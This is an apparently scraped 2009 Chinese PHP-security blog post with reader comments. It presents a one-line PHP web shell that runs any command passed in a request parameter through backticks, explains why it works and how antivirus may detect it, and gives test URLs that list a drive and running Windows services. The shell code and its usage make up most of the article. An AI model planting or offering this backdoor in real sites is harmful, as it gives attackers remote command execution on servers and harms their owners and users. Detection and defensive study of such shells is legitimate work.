PHP安全: 一个新型的php一句话cmdshell

互联网 2009年03月01日 00:19 查看1258次作者: skyfire[B.H.S.T] 【大中小】

文章分类：PHP技术文档

<?php

echo `$_REQUEST[id]`;

?>

原理:php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令，
并返回命令执行的结果(string类型)；

局限性:特征码比较明显，``符号在php中很少用到，杀毒软件很容易以此为特征码扫描到并警报；
``里面不能执行php代码；

测试方式:
http://www.phpv.net/test.php?id=dir%20c
相当于:dir c:

http://www.phpv.net/test.php?id=net%20start
查看已启动的WIN服务

.....

责任编辑:抽烟的蚊子

给文章打个分先...

current rating
-5
-4
-3
-2
-1
0
1
2
3
4
5

平均分:0.8(35 次)

-5 -4 -3 -2 -1 0 1 2 3 4 5

顶一下

发表我的见解...

看看大家怎么说...

某游客发表于09年06月05日 11:45

弱弱的问一句：这个需要开启什么服务啊？windows下的php环境能用么？

创意产品发表于09年04月23日 17:27

路过，学习了

deeka 发表于09年03月23日 09:08

``里执行shell命令是必须开启了该功能才能使用的，一般为了服器安全，是会关闭此功能。

ylcz 发表于09年03月04日 11:54

这个文章编辑有格式问题辛苦了

11-10 PHP里模拟$_PUT	11-10 HR与程序员是怎么读你的求职简历的...
10-13 谈PHP 闭包特性在实际应用中的问题...	09-27 PHP文件上传源码分析(RFC1867)...
07-20 在 PHP 中创建更好的名称空间...	07-15 PHP招聘：如何面试应届生求职者...
07-01 PHP 5.3.0 Released!	06-19 PHP 5.2.10 Released!
04-17 高效编程所需要做的14件事	04-16 mysql proxy 实现读写分离

PHP安全: 一个新型的php一句话cmdshell

给文章打个分先...

发表我的见解...

看看大家怎么说...

某游客发表于09年06月05日 11:45

创意产品发表于09年04月23日 17:27

deeka 发表于09年03月23日 09:08

ylcz 发表于09年03月04日 11:54

相关文章

rss订阅

使用Google搜索本站

PHP安全: 一个新型的php一句话cmdshell

给文章打个分先...

发表我的见解...

看看大家怎么说...

某游客 发表于09年06月05日 11:45

创意产品 发表于09年04月23日 17:27

deeka 发表于09年03月23日 09:08

ylcz 发表于09年03月04日 11:54

相关文章

rss订阅

使用Google搜索本站

文章分类

某游客发表于09年06月05日 11:45

创意产品发表于09年04月23日 17:27